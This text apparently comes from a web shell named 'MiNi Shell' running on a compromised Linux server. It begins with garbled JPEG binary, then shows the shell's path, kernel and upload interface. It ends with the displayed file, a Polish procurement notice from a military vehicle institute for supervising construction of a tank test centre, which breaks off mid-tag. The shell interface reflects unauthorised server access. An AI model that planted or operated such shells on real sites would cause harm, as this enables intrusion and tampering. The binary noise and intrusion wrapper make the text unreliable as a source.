JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240917/0050413401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usł. pełnienia nadzoru inw. wraz z koordynacją pr. inw. w ramach real. zad. inw. pn.: Budowa Centrum Badań Testowych Czołgów i Pojazdów Gąsienicowych w l. 24-27, systemie &#34;ZAPROJEKTUJ I WYBUDUJ&#34;. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJSKOWY INSTYTUT TECHNIKI PANCERNEJ I SAMOCHODOWEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011561862</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Okuniewska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sulejówek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-070</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261811012</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@witpis.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.witpis.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> działalność naukowo-badawcza </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usł. pełnienia nadzoru inw. wraz z koordynacją pr. inw. w ramach real. zad. inw. pn.: Budowa Centrum Badań Testowych Czołgów i Pojazdów Gąsienicowych w l. 24-27, systemie &#34;ZAPROJEKTUJ I WYBUDUJ&#34;. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e78c91ad-a82d-4dc9-a2b1-1d6c501e9757</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00504134</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00060120/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Pełnienie nadzoru inwestorskiego wraz z koordynacją procesu inwestycyjnego w ramach realizacji zadania inwestycyjnego pn.: Budowa Centrum Badań Testowych Czołgów i Pojazdów Gąsienicowych w l. 24-27</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://witpis.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://witpis.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawcy w celu bezproblemowej<br/>komunikacji z Zamawiającym na Platformie powinni<br/>przed upływem terminu składania ofert przystąpić do postępowania na Platformie poprzez funkcję<br/>„Przystąp do postępowania” oraz posiadać założone konto w aplikacji Marketplanet OnePlace.<br/>2. W celu bezproblemowej pracy z Platformą, Wykonawca powinien posiadać co najmniej:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>56 KB/s;<br/>2) komputer klasy PC z zainstalowanym systemem operacyjnym Microsoft Windows XP/Vista/Windows<br/>7/ Windows 10; w przypadku komputera z systemem operacyjnym Microsoft Windows 7/ Windows 8<br/>przeglądarka MS Internet Explorer 10.0 (lub nowsza) z obsługą Active X lub dla systemów<br/>operacyjnych XP/Vista/Windows 7/Windows 8 przeglądarka Firefox z obsługą Javy, siła szyfrowania:<br/>128bit; w przypadku komputera z systemem operacyjnym Microsoft Windows 10 przeglądarka MS<br/>Internet Explorer 11 z obsługą Active X lub Firefox<br/>z obsługą Javy, siła szyfrowania: 128bit;<br/>3) zainstalowaną dowolną przeglądarkę internetową: Chrome; Mozilla Firefox;<br/>4) włączoną obsługę JavaScript;<br/>5) podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę<br/>certyfikatu używanego przez Wykonawcę.<br/>3. Dopuszczalny format kwalifikowanego podpisu elektronicznego:<br/>1) dokumenty w formacie „pdf” zaleca się podpisywać formatem PAdES,<br/>2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf”, wtedy<br/>należy użyć formatu XAdES. W takiej sytuacji należy załączyć oddzielny plik<br/>z podpisem (w takiej sytuacji Wykonawca winien upewnić się, że załącza oba<br/>pliki, tj. plik z treścią dokumentu oraz plik z podpisem elektronicznym).<br/>3) Zamawiający zaleca, aby kwalifikowany podpis elektroniczny, którym posługuje<br/>się Wykonawca był podpisem wydanym na terenie Rzeczpospolitej Polskiej,<br/>bądź innych krajów należących do Unii Europejskiej.<br/>4. Obsługiwane przez Platformę formaty przesyłanych danych tj. plików o wielkości<br/>do 100 MB w formatach: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx,<br/>csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4,<br/>ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES,<br/>PAdES, CAdES, ASIC, XMLenc.<br/>5. Każdy plik załączony i zapisany przez Wykonawcę na Platformie, widoczny jest<br/>w Systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero<br/>po automatycznym odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.<br/>6. Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego<br/>datę oraz dokładny czas (hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data &#34;-<br/>czas lokalny serwera synchronizowany odpowiednim źródłem czasu.<br/>7. Format kodowania treści w obrębie platformy - UTF8.<br/>8. Cała komunikacja pomiędzy użytkownikiem Systemu a serwerem jest wykonywana przy użyciu<br/>bezpiecznego protokołu HTTPS</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych przetwarzanych w związku z prowadzeniem<br/>postępowania o udzielenie zamówienia publicznego jest Wojskowy Instytut Techniki Pancernej i Samochodowej w Sulejówku zwany<br/>dalej „WITPiS” ul. Okuniewska 1, 05-070 Sulejówek<br/>8. Administrator wyznaczył Inspektora Ochrony Danych z którym można się skontaktować się za pośrednictwem adresu e-mail:<br/>iod@witpis.eu.<br/>9. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną<br/>ich przetwarzania jest art. 6 ust.1 lit. c RODO w związku z ustawą Prawo zamówień publicznych i rozporządzeniem Ministra Rozwoju<br/>w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy<br/>w postępowaniu i udzielenie zamówienia.<br/>10. Dane osobowe przechowywane będą przez okres niezbędny, wynikający z przepisów, zgodnie z art. 78 ust. 1 ustawy Pzp, przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>11. Dane osobowe pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim<br/>zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ograniczenie dostępu do danych osobowych może wystąpić tylko w przypadkach<br/>jeśli jest to uzasadnione ochroną prywatności zgodnie z ustawą Prawo zamówień publicznych.<br/>13. Dane nie będą przekazywane do państwa trzeciego ani do organizacji międzynarodowej.<br/>14. Osobie, której dane dotyczą przysługuje prawo:<br/>- dostępu do danych osobowych przy czym w przypadku gdy wykonanie obowiązków,<br/>o których mowa w art. 15 ust. 1-3 RODO wymagałoby dużego wysiłku zamawiający może żądać od osoby której dane dotyczą<br/>dodatkowych informacji,<br/>- żądania sprostowania dotyczących jej danych osobowych,<br/>- ograniczenia przetwarzania w przypadkach wymienionych w RODO przy czym żądanie nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania<br/>o udzielenie zamówienia publicznego.<br/>15. Osobie której dane dotyczą nie przysługuje prawo do przenoszenia danych osobowych, ich usunięcia ani prawo wniesienia<br/>sprzeciwu, ponieważ przetwarzanie danych odbywa się na podstawie art. 6 ust.1 lit. c RODO.<br/>16. W trakcie przetwarzania danych nie będzie dochodziło do zautomatyzowanego podejmowania decyzji, ani do profilowania.<br/>17. Osobie, której dane dotyczą przysługuje prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych osobowych (adres: 00-<br/>193 Warszawa, ul. Stawki 2).<br/>18. Podanie danych osobowych w związku z udziałem w postępowaniu o zamówienia publiczne nie jest obowiązkowe ale niezbędne.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PP 02/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 750000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pełnienie nadzoru inwestorskiego dla prac projektowych i robót budowlanych dla Zadania inwestycyjnego pn: Budowa Centrum Badań Testowych Czołgów i Pojazdów Gąsienicowych w latach 2024-2027, realizowanego w systemie ‘zaprojektuj i wybuduj’, oraz koordynację realizacji procesu inwestycyjnego, z poniżej określonym zakresem obowiązków <br/>i kompetencji. <br/>Ilekroć w dokumencie jest mowa o inwestorze, należy przez to rozmieć Zamawiającego. <br/>1.	Opis Zadania inwestycyjnego <br/>Na Zadanie inwestycyjne składają się następujące podzadania polegające na zaprojektowaniu i budowie: torów badawczych, rowu do brodzenia, stanowiska do badania uchwytów, stanowiska do badania wciągarek, komory klimatycznej (przebudowa), magazynu koncesjonowanego, stacji kontroli pojazdów, hali garażowej oraz remont pomieszczeń - szczegółowo opisane w Programie Funkcjonalno – Użytkowym, z końcowym terminem realizacji do 31 grudnia 2027 r. <br/>Zamawiający zaleca, aby Wykonawca, przed złożeniem oferty, zapoznał się <br/>z Programem Funkcjonalno – Użytkowym, dostępnym w siedzibie Zamawiającego.<br/>2. Nadzór inwestorski nad realizacją Zadania inwestycyjnego będzie obejmować następujący zakres:<br/>- etap i - odbiór dokumentacji projektowej <br/>1)	branża architektoniczna - uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej;<br/>2)	branża konstrukcyjno – budowlana - uprawnienia do projektowania bez ograniczeń w specjalności konstrukcyjno – budowlanej;<br/>3)	branża sanitarna - uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych;<br/>4)	branża elektryczna - uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: elektrycznych i elektroenergetycznych;<br/>5)	branża teletechniczna - uprawnienia budowlane do projektowania bez ograniczeń w specjalnościach instalacyjnych w telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą;<br/>6)	branża drogowa - uprawnienia budowlane do projektowania bez ograniczeń w specjalności inżynieryjnej drogowej.<br/>- etap II- nadzór inwestorski na prowadzonymi robotami budowlanymi<br/>1)	branża konstrukcyjno – budowlana - uprawnienia do kierowania bez ograniczeń w specjalności konstrukcyjno – budowlanej;<br/>2)	branża sanitarna - uprawnienia budowlane do kierowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych;<br/>3)	branża elektryczna - uprawnienia budowlane do kierowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: elektrycznych i elektroenergetycznych; <br/>4)	branża teletechniczna - uprawnienia budowlane do kierowania bez ograniczeń w specjalnościach instalacyjnych w telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą;<br/>5)	branża drogowa - uprawnienia budowlane do kierowania bez ograniczeń w specjalności inżynieryjnej drogowej.<br/>3.	Inspektor nadzoru inwestorskiego w branży konstrukcyjno-budowlanej będzie zarazem pełnił funkcję inspektora koordynatora zespołu inspektora nadzoru inwestorskiego. <br/>4.	Inspektorzy nadzoru inwestorskiego odpowiedzialni są za sprawowanie nadzoru inwestorskiego nad pracami projektowymi i robotami budowlanymi zgodnie z: <br/>1) ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn.: Dz.U. z 2024 r. poz 725, ze zm. poz. 834), w szczególności art. 25 i 26. <br/>2) zasadami aktualnej wiedzy technicznej oraz obowiązującymi przepisami,<br/>4) polskimi normami i/lub normami zharmonizowanymi z UE i przepisami dotyczącymi realizacji i eksploatacji budynków i budowli, <br/>5)	po odbiorze dokumentacji projektowej – zgodnie z projektem budowlanym, projektami wykonawczymi, przedmiarami robót oraz szczegółowymi specyfikacjami wykonania i odbioru robót budowlanych.<br/>5.	Każdy inspektor nadzoru jest obowiązany jest posiadać przez cały okres pełnienia funkcji ważne zaświadczenie o przynależności do właściwej izby samorządu zawodowego oraz aktualną polisę w zakresie ubezpieczenia odpowiedzialności cywilnej. <br/>6.	Zakres szczegółowych obowiązków i kompetencji w zakresie nadzoru inwestorskiego oraz koordynacji Zadania inwestycyjnego: <br/>- na etapie dokumentacji projektowej:<br/>zapewnienie prawidłowej i terminowej realizacji Zadania poprzez czynny udział w opracowywaniu i opiniowaniu dokumentacji projektowej, w tym:<br/>1)	współpraca z inwestorem i projektantem w zakresie weryfikacji <br/>i opiniowania proponowanych rozwiązań projektowych; <br/>2)	wydawanie opinii inspektorskich do dokumentacji projektowej na każdym etapie wymaganym przez inwestora, w tym weryfikacja kosztorysów pod względem zakresu rzeczowego, ilościowego, cenowego i technologii wykonania robót; <br/>3)	czynny udział w posiedzeniach Komisji Oceny Projektów Inwestycyjnych (KOPI) oraz radach technicznych;<br/>4)	opiniowanie i uzgadnianie projektów umów, aneksów do umów, porozumień z operatorami sieci o dostawcami mediów (w tym umów przyłączeniowych) i innych niezbędnych dokumentów w procesie projektowym.<br/>– na etapie robót budowlanych:<br/>1)	sprawowanie funkcji technicznej w zakresie nadzoru inwestorskiego zgodnie z art. 25 i 25 ustawy Prawo budowlane, w tym reprezentowanie inwestora na budowie poprzez sprawowanie kontroli zgodności jej realizacji z dokumentacją projektową, decyzjami administracyjnymi, przepisami, zasadami wiedzy technicznej oraz innymi dokumentami mającymi wpływ na prawidłową realizację Zadania inwestycyjnego;<br/>2)	znajomość dokumentacji projektowej, umowy z wykonawcą robót budowlanych, terenu budowy, decyzji administracyjnych, warunków przyłączeniowych oraz innych dokumentów mających wpływ na prawidłową realizację Zadania inwestycyjnego, niezbędnych do prawidłowego pełnienia funkcji Inspektora nadzoru inwestorskiego;<br/>3)	znajomość i przestrzeganie obowiązujących przepisów prawa, w tym przepisów resortowych i aktów normatywnych mających zastosowanie przy realizacji Zadania;<br/>4)	protokólarne przekazywanie terenu budowy oraz niezbędnej dokumentacji projektowej wykonawcy robót budowlanych;<br/>5)	wydawanie kierownikowi budowy oraz pozostałym uczestnikom procesu budowlanego poleceń wynikających z ustawy prawo budowlane i przepisów powiązanych i odrębnych w ramach pełnienia funkcji inspektora nadzoru budowlanego; <br/>6)	sprawdzanie jakości wykonanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie;<br/>7)	dbałość o zastosowanie przez wyłonionych w odrębnych postępowaniach wykonawców robót budowlanych właściwych materiałów umożliwiających osiągnięcie właściwych założeń energetycznych projektu, estetycznych i funkcjonalnych budynku wynikających z obowiązujących norm i przepisów budowlanych;<br/>8)	ocena jakościowa i odbiór zgłoszonych do odbioru robót (części robót) oraz, w przypadku pozytywnej oceny, podpisywanie protokołu odbioru wykonanych robót (części robót);<br/>9)	koordynowanie oraz udział w opracowaniu przez wykonawcę robót budowlanych protokołów konieczności w razie zaistnienia konieczności zmiany terminów umownych, wykonania robót dodatkowych, zamiennych, zaniechanych, zwiększających lub zmniejszających obmiar w zakresie branży sanitarnej;<br/>10)	dostarczanie wykonawcy robót budowlanych rozwiązań dodatkowych lub prac zamiennych;<br/>11)	kontrola zgodności realizacji robót z zawartą umową z wykonawcą robót budowlanych, harmonogramem rzeczowo – finansowym załączonym do umowy z tym wykonawcą, tabelą elementów do fakturowania przejściowego, a w przypadku stwierdzenia niezgodności niezwłoczne powiadomienie inwestora;<br/>12)	koordynowanie terminowości wykonania Zadania inwestycyjnego na etapie realizacji robót budowlanych, z uwzględnieniem terminów umownych oraz terminów narzuconych odrębnymi przepisami;<br/>13)	organizowanie i przeprowadzanie narad budowy (co najmniej raz w tygodniu oraz ponadto wg potrzeb) rad technicznych i spotkań koordynacyjnych podczas realizacji Zadania inwestycyjnego (wg potrzeb);<br/>14)	współpraca z projektantem i inwestorem w zakresie zastosowania koniecznych zmian w dokumentacji projektowej oraz odpowiedzi na zapytania projektowe wykonawcy robót budowlanych, po ich ówczesnym zweryfikowaniu; <br/>15)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji urządzeń technicznych i pozostałych elementów oraz przygotowanie i udział w czynnościach odbiorowych gotowych obiektów budowlanych i przekazanie ich do użytkowania;<br/>16)	bieżące monitorowanie możliwości przerobowych wykonawcy robót budowlanych na poszczególnych podzadaniach oraz zagrożeń w realizacji przydzielonych limitów; <br/>17)	opiniowanie i uzgadnianie projektów umów, aneksów do umów, porozumień, w tym umów przyłączeniowych i podwykonawczych oraz innych niezbędnych dokumentów w procesie realizacji inwestycji;<br/>18)	przestrzeganie i stosowanie się do wewnętrznych regulaminów, wytycznych<br/>i procedur inwestora, przekazanych Wykonawcy;<br/>19)	przestrzeganie przepisów o ochronie informacji;<br/>20)	przestrzeganie zasad bhp, ppoż. i ochrony środowiska;<br/>21)	stosownie do potrzeb - przygotowywanie sprawozdań z realizacji Zadania inwestycyjnego, harmonogramów, raportów bądź innych materiałów dotyczących realizacji i stanu robót na odprawy, konferencje;<br/>22)	udział w opracowywaniu miesięcznych i kwartalnych i rocznych raportów zawierających m.in. dane dotyczące rzeczowej i finansowej realizacji robót oraz dokonywanie analiz ryzyka związanych z ich wykonawstwem;<br/>23)	kontrolowanie rozliczeń budowy, z uwzględnieniem przydzielanych rocznych limitów wydatkowania oraz ich zmian;<br/>24)	sprawdzanie i potwierdzanie w księgach obmiaru, tabeli elementów do fakturowania przejściowego (kosztorysach jak<br/>o elementach pomocniczych) i na fakturach ilości, wartości i zakresu wykonanych robót w odniesieniu do stanu faktycznego; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71700000-5 - Usługi nadzoru i kontroli</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">39 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 